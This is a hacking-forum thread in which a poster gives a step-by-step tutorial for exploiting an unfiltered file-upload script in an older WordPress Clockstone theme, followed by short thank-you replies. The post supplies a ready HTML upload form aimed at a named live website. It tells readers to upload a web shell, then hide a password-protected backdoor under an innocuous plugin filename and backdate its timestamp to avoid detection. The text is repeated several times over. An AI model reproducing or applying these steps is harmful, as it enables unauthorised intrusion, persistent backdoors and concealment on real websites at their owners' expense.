[Faner]

Greetings guys, I decided to make small tutorial how to get access on wp powered websites which have older clockstone version.

Credits to DigiP for finding this vulnerability.

Also, as an example I'll take http://razanime.com/. Since some skiddies already defaced it, I doubt you can do even more harm.

Ok, basically vulnerability exist in wp-content/themes/clockstone/theme/functions/upload.php which doesn't filter uploaded files and can be accessed remotely.

So we just make simple html upload form, in this case it looks like this:

PHP Code:

<html>
<body>
<form enctype="multipart/form-data" action="http://razanime.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
Upload dir:<input type="text" name="url" value="./" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html> 


Keep in mind, that in some websites clockstone is in Clonestone directory, so in the html above you need to change action to somesite.com/wp-content/themes/Clockstone/theme/functions/upload.php

Save it as anything.html, run it in browser and upload a shell of your choice.



you should get you file's name encoded in md5. I got this:



To acces your shell, change upload.php in url bar with the name you see on the screen.



As you see in image above, website already have 6 shells uploaded But I expected nothing less, after all it's already defaced.

Now I deleted all other shells and will hide my other shell, protected with password, in some website's directory with unsuspicious name, like class-file-backup.php . I will upload it to wp-content/plugins/wordpress-backup-to-dropbox/Classes/



Ok, so now I uploaded my shell, and using it I changed it's date of modification to same as other files in that directory.





Now I will delete my first shell in /wp-content/themes/clockstone/theme/functions/



And that's all, website is successfully shelled.

Hope you liked it. If you do, a feedback is always appreciated :ok:
Info about vulnerability: http://packetstormsecurity.org/files/dow...-shell.pdf

Oh yes, I wrote this just to introduce you to this vulnerability, I take no responsibility for anything you will do. But I highly disapprove such lame things as defaces or deletion of all website files......

[Faner]

Greetings guys, I decided to make small tutorial how to get access on wp powered websites which have older clockstone version.

Credits to DigiP for finding this vulnerability.

Also, as an example I'll take http://razanime.com/. Since some skiddies already defaced it, I doubt you can do even more harm.

Ok, basically vulnerability exist in wp-content/themes/clockstone/theme/functions/upload.php which doesn't filter uploaded files and can be accessed remotely.

So we just make simple html upload form, in this case it looks like this:

PHP Code:

<html>
<body>
<form enctype="multipart/form-data" action="http://razanime.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
Upload dir:<input type="text" name="url" value="./" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html> 


Keep in mind, that in some websites clockstone is in Clonestone directory, so in the html above you need to change action to somesite.com/wp-content/themes/Clockstone/theme/functions/upload.php

Save it as anything.html, run it in browser and upload a shell of your choice.



you should get you file's name encoded in md5. I got this:



To acces your shell, change upload.php in url bar with the name you see on the screen.



As you see in image above, website already have 6 shells uploaded But I expected nothing less, after all it's already defaced.

Now I deleted all other shells and will hide my other shell, protected with password, in some website's directory with unsuspicious name, like class-file-backup.php . I will upload it to wp-content/plugins/wordpress-backup-to-dropbox/Classes/



Ok, so now I uploaded my shell, and using it I changed it's date of modification to same as other files in that directory.





Now I will delete my first shell in /wp-content/themes/clockstone/theme/functions/



And that's all, website is successfully shelled.

Hope you liked it. If you do, a feedback is always appreciated :ok:
Info about vulnerability: http://packetstormsecurity.org/files/dow...-shell.pdf

Oh yes, I wrote this just to introduce you to this vulnerability, I take no responsibility for anything you will do. But I highly disapprove such lame things as defaces or deletion of all website files......

[Faner]

Greetings guys, I decided to make small tutorial how to get access on wp powered websites which have older clockstone version.

Credits to DigiP for finding this vulnerability.

Also, as an example I'll take http://razanime.com/. Since some skiddies already defaced it, I doubt you can do even more harm.

Ok, basically vulnerability exist in wp-content/themes/clockstone/theme/functions/upload.php which doesn't filter uploaded files and can be accessed remotely.

So we just make simple html upload form, in this case it looks like this:

PHP Code:

<html>
<body>
<form enctype="multipart/form-data" action="http://razanime.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
Upload dir:<input type="text" name="url" value="./" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html> 


Keep in mind, that in some websites clockstone is in Clonestone directory, so in the html above you need to change action to somesite.com/wp-content/themes/Clockstone/theme/functions/upload.php

Save it as anything.html, run it in browser and upload a shell of your choice.



you should get you file's name encoded in md5. I got this:



To acces your shell, change upload.php in url bar with the name you see on the screen.



As you see in image above, website already have 6 shells uploaded But I expected nothing less, after all it's already defaced.

Now I deleted all other shells and will hide my other shell, protected with password, in some website's directory with unsuspicious name, like class-file-backup.php . I will upload it to wp-content/plugins/wordpress-backup-to-dropbox/Classes/



Ok, so now I uploaded my shell, and using it I changed it's date of modification to same as other files in that directory.





Now I will delete my first shell in /wp-content/themes/clockstone/theme/functions/



And that's all, website is successfully shelled.

Hope you liked it. If you do, a feedback is always appreciated :ok:
Info about vulnerability: http://packetstormsecurity.org/files/dow...-shell.pdf

Oh yes, I wrote this just to introduce you to this vulnerability, I take no responsibility for anything you will do. But I highly disapprove such lame things as defaces or deletion of all website files......

[soldi3r]

Nice Tut.. Thanks man..

[soldi3r]

Nice Tut.. Thanks man..

[d3v0id]

Thnx ,Cool Tutorial and self explanatory ,+1 rep for you

[d3v0id]

Thnx ,Cool Tutorial and self explanatory ,+1 rep for you

[Faner]

Thanks for replies, glad you like it.

[daudmalik06]

i dont understand the step where you say it should be md5
please pm me its detail

[daudmalik06]

i dont understand the step where you say it should be md5
please pm me its detail